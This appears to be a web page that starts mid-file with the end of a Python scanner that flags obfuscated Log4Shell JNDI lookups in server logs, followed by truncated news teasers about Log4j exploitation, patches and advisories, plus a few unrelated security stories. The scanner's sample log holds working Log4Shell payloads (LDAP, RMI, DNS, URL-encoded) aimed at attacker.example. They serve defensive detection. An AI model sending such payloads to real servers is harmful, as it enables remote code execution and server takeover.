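        return body.split(":-", 1)[1]
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":     # ${lower:J} -> j
        return rest.lower()
    if sep and head.lower() == "upper":     # ${upper:j} -> J
        return rest.upper()
    return m.group(0)                       # anything else (including jndi) is kept

def normalize(line, max_rounds=16):
    """URL-decode (repeatedly, for double encoding), then fold lookups inside-out."""
    for _ in range(3):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    for _ in range(max_rounds):
        folded = INNER.sub(_fold, line)
        if folded == line:
            break
        line = folded
    return line

def scan_line(line):
    """Return the JNDI scheme ('ldap', 'rmi', 'dns', ...) or None."""
    m = JNDI.search(normalize(line))
    return m.group(1).lower() if m else None

def scan_log(text):
    """(line number, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        scheme = scan_line(line)
        if scheme:
            hits.append((number, scheme))
    return hits

# Constructed access-log sample: a benign request, a plain LDAP lookup in the
# User-Agent, a lower-obfuscated RMI lookup in the query string, a ${::-x}-obfuscated
# DNS lookup, and a URL-encoded LDAP lookup.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example:1389/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://attacker.example:1099/b} HTTP/1.1" 400 0 "-" "curl/7.79"
10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-d}ns://attacker.example/c}"
10.0.0.11 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 200 10 "-" "python-requests/2.26"
"""

if __name__ == "__main__":
    for number, scheme in scan_log(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme}")
```

Run it over web-server and application logs from the exposure window, not just the lines containing `jndi`. An RMI hit matters as much as an LDAP one (both schemes load remote classes), while a DNS hit shows the string was evaluated by a vulnerable logger and is typically used for confirmation or exfiltration. The folder models only the three lookup forms above; Log4j has others (`${env:...}`, `${sys:...}`, `${date:...}`), so treat this as a triage filter rather than a full parser of Log4j lookup syntax.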
Microsoft urges admins of self-hosted Minecraft servers to upgrade to the latest release to defend against Khonsari ransomware attacks exploiting the critical Log4Shell security vulnerability.
Mojang Studios, the Swedish video game developer behind Minecraft, released an emergency security update last week to address the bug tracked as CVE-2021-44228 in the Apache Log4j Java logging library (used by the game's Java Edition client and multiplayer servers).
While there was no mention of attacks targeting Minecraft serv...
Call it a “logjam” of threats: Attackers including nation-state actors have already targeted half of all corporate global networks in security companies’ telemetry using at least 70 distinct malware families — and the fallout from the Log4j vulnerability is just beginning.
Researchers manning keyboards all over the world have spent the past several days chasing attacks aimed at a now-infamous Log4j Java library bug, dubbed Log4Shell (CVE-2021-44228). Side note: Log4j is pronounced,...
SAP has identified 32 apps that are affected by CVE-2021-44228 – the critical vulnerability in the Apache Log4j Java-based logging library that’s been under active attack since last week.
As of yesterday, Patch Tuesday, the German software maker reported that it’s already patched 20 of those apps, and it’s still feverishly working on fixes for 12. SAP provided workarounds for some of the pending patches in this document, accessible to users on the company’s support portal.
...
As if finding one easily exploited and extremely dangerous flaw in the ubiquitous Java logging library Apache Log4j hadn’t already turned the Internet security community on its ear, researchers now have found a new vulnerability in Apache’s patch issued to mitigate it.
Last Thursday security researchers began warning that a vulnerability tracked as CVE-2021-44228 in Apache Log4j was under active attack and had the potential, according to many reports, to break the internet. Dubbed Log4...
Microsoft says cyber-spies linked to Beijing, Tehran are getting busy with security flaw along with world + dog
Log4j doesn't just blow a hole in your servers, it's reopening that can of worms: Is Big Biz exploiting open source?
Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole.
Up until now, it was largely accepted that mere private miscreants, criminal gangs, and security researchers were mostly scanning the internet for systems and services vulnerable to CVE-2021-44228 in the open-source logging library widely used by Java applications. Network observers say they've seen tens of thousands of attempts per minute. Succ...
As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability (CVE-2021-44228) in the Apache Log4j Java-based logging library.
Also known as Log4Shell or LogJam, the vulnerability is now being used by threat actors linked to governments in China, Iran, North Korea, and Turkey, as well as access brokers used by ransomware gangs.
Among the first threat actors to leverage Log4Shell to drop payloads are cryptocurren...
News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an “internet meltdown,” as well as the “worst cybersecurity bug of the year.” Names like “Apple,” “Twitter” and “Cloudflare” are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?
We asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs i...
Now open-source logging library's JNDI disabled entirely by default, message lookups removed
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet.
However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and re...
Private equity owners play pass the parcel
One of the biggest beasts in the password management world, LastPass, is being spun out from parent LogMeIn as a "standalone cloud security" organisation.
"The success we've seen across the entire LogMeIn portfolio over the last 18 months proves there is a vast growth opportunity ahead for both LastPass and LogMeIn," said Andrew Kowal, a partner at Francisco Partners.
Francisco Partners, a private equity business, bought the bundle of remote access, collab and password manager tools ...
Just as the holiday season is approaching our doorstep, a critical vulnerability in an Apache code library called Log4j 2 has come knocking at the door. Log4j is an open-source Java-based logging library that is widely used by many products, services and Java components. It’s little surprise that the flaw, which scored a perfect 10 on the CVSS scale and is putting countless servers at risk of complete takeover, has sent shockwaves far beyond the security industry.
Indeed, with proof of c...
Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical remote code-execution (RCE) flaw (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.
Now under active exploit, the “Log4Shell” bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.
First, analysts at Net...
The internet has a fast-spreading, malignant cancer – otherwise known as the Apache Log4j logging library exploit – that’s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.
Most of the attacks focus on cryptocurrency mining done on victims’ dimes, as seen by Sophos, Microsoft and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.
According to Micros...
This might be the bug that deserves the website, logo and book deal
Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly – for now – on turning infected devices into cryptocurrency-mining botnet drones.
Israel's Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post.
Apache Log4j is an open-source logging utility written in Java that is used all over the world in many sof...
An excruciating, easily exploited flaw in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover — and it’s being exploited in the wild.
The flaw first turned up on sites that cater to users of the world’s favorite game, Minecraft, on Thursday. The sites reportedly warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messa...
Proof-of-concept exploits for a critical zero-day vulnerability in the ubiquitous Apache Log4j Java-based logging library are currently being shared online, exposing home users and enterprises alike to remote code execution attacks.
Log4j is developed by the Apache Foundation and is widely used by both enterprise apps and cloud services.
Thus, while home users might have moved on from Java, anything from enterprise software to cloud software such as Apple's iCloud and Steam is likely vuln...
Swedish video game developer Mojang Studios has released an emergency Minecraft security update to address a critical bug in the Apache Log4j Java logging library used by the game's Java Edition client and multiplayer servers.
The vulnerability is fixed with the release of
, which is now rolling out to all customers.
"This release fixes a critical security issue for multiplayer servers, changes how the world fog works to make more of the world visible, and fixes a couple of ...
Prepare to have a very busy weekend of mitigating and patching
An unauthenticated remote code execution vulnerability in Apache's Log4j Java-based logging tool is being actively exploited, researchers have warned after it was used to execute code on Minecraft servers.
Infosec firm Randori summarised the vuln in a blog post, saying: "Effectively, any scenario that allows a remote connection to supply arbitrary data that is written to log files by an application utilizing the Log4j library is susceptible to exploitation."
Crafted proof-of-concept ...
Miscreants deployed cryptominers, backdoors since late December, Sophos says
VMware's Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware.
In a report this week, cybersecurity firm Sophos wrote that VMware's virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos re...
Here's how Wiz can help
Sponsored Feature When software vulnerabilities and zero days moved up the enterprise worry list 15 years ago, nobody imagined the world would one day end up with a threat as perplexing as Log4Shell – a vulnerability in the Apache Log4j open source logging framework that's used in software on all major operating systems spanning everything from cloud services to PC games.
In what might be called the happier days of the past, flaws were something that affected single applications and indi...
Malicious cyber actors go after 2021's biggest misses, spend less time on the classics
Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021, according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies.
It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years.
Of course...
Everyone's heard of the critical log4j zero-day by now. Dubbed 'Log4Shell' and 'Logjam,' the vulnerability has set the internet on fire.
Thus far, the log4j vulnerability, tracked as CVE-2021-44228, has been abused by all kinds of threat actors from
to
and others to
on vulnerable systems.
Log4j usage is rampant among many software products and multiple
have since surfaced. And, it now seems, 'logback' isn't all that immune either.
Below...
Amazon Web Services (AWS) has fixed four security issues in its hot patch from December that addressed the critical Log4Shell vulnerability (CVE-2021-44228) affecting cloud or on-premise environments running Java applications with a vulnerable version of the Log4j logging library or containers.
The hot patch packages from Amazon are not exclusive to AWS resources and allowed escaping a container in the environment and taking control of the host. The flaws could als...
US Federal Civilian Executive Branch agencies have been ordered to patch the critical and actively exploited Log4Shell security vulnerability in the Apache Log4j library within the next six days.
The order comes through an emergency directive issued by the Cybersecurity and Infrastructure Security Agency (CISA) today.
This is not surprising given the risk the ongoing exploitation of this vulnerability poses and seeing that the security flaw (tracked as CVE-2021-44228) has also
The US Federal Trade Commission (FTC) has warned today that it will go after any US company that fails to protect its customers' data against ongoing Log4J attacks.
"The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future," the US government agency
.
"The duty to take reasonable steps to mitigate known software vulnerabilit...
Hackers believed to be part of the Iranian APT35 state-backed group (aka 'Charming Kitten' or 'Phosphorus') have been observed leveraging Log4Shell attacks to drop a new PowerShell backdoor.
The modular payload can handle C2 communications, perform system enumeration, and eventually receive, decrypt, and load additional modules.
Log4Shell is an exploit for CVE-2021-44228, a critical remote code execution vulnerability in Apache Log4j disclosed in December.
According to research...
The Log4Shell vulnerabilities in the widely used Log4j software are still leveraged by threat actors today to deploy various malware payloads, including recruiting devices into DDoS botnets and for planting cryptominers.
According to a report by Barracuda, the past couple of months were characterized by dips and spikes in the targeting of Log4Shell, but the volume of exploitation attempts has remained relatively constant.
After analyzing these attacks, Barracuda determined that ...
The Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch systems against the critical Log4Shell vulnerability and released mitigation guidance in response to active exploitation.
This follows threat actors' head start in scanning for and
to deploy malware.
Even though Apache quickly released a patch to address the maximum severity remote code execution flaw (CVE-2021-44228), it only happened after attackers began deploying the ...
The Cybersecurity and Infrastructure Security Agency (CISA) has
the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.
"log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities," the cybersecurity agency
The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers.
The vulnerability is tracked as CVE-2021-44228, aka Log4Shell, and impacts many products, including VMware Horizon.
The exploitation of vulnerable Horizon deployments
, but many admins are yet to apply the available security updates.
According to a report published by analyst...
Hackers are targeting Russian government agencies with phishing emails that pretend to be Windows security updates and other lures to install remote access malware.
The attacks are being conducted by a previously undetected APT (advanced persistent threat) group believed to be operating from China, which is linked to four separate spear-phishing campaigns.
These operations spanned between February and April 2022, coinciding with the Russian invasion of Ukraine. Its targets have been g...
Plus: Ransomware gangster sentenced, Dell patches more Log4j bugs, and cartoon apes gone bad
In Brief Triton malware remains a threat to the global energy sector, according to an FBI warning.
Triton is the software nasty used in a 2017 cyber attack carried out by a Russian government-backed research institution against a Middle East petrochemical facility.
The new FBI warning [PDF] came a day after the US Department of Justice unsealed a pair of indictments that detail alleged Russian government efforts to use supply chain attacks and malware in an attempt to compromise and ...